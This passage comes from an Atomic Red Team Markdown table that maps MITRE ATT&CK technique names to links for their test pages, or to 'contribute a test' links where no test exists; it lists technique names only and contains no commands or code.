-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Device Driver Discovery](../../T1652/T1652.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Replication Through Removable Media](../../T1091/T1091.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | [Automated Exfiltration](../../T1020/T1020.md) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | [Service Stop](../../T1489/T1489.md) |
-| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Application Window Discovery](../../T1010/T1010.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hide Artifacts](../../T1564/T1564.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Domain Trust Discovery](../../T1482/T1482.md) |  | [Video Capture](../../T1125/T1125.md) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
-|  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [File and Directory Discovery](../../T1083/T1083.md) |  | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
-|  |  | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Log Enumeration](../../T1654/T1654.md) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | [Encrypted Channel](../../T1573/T1573.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Process Discovery](../../T1057/T1057.md) |  | Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  |  | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) |  |
-|  |  | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Time Providers](../../T1547.003/T1547.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
-|  |  | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Indirect Command Execution](../../T1202/T1202.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  |  | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
-|  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Debugger Evasion](../../T1622/T1622.md) |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Masquerading](../../T1036/T1036.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
-|  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | [Forced Authentication](../../T1187/T1187.md) |  |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Process Injection](../../T1055/T1055.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
-|  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
-|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Reflective Code Loading](../../T1620/T1620.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
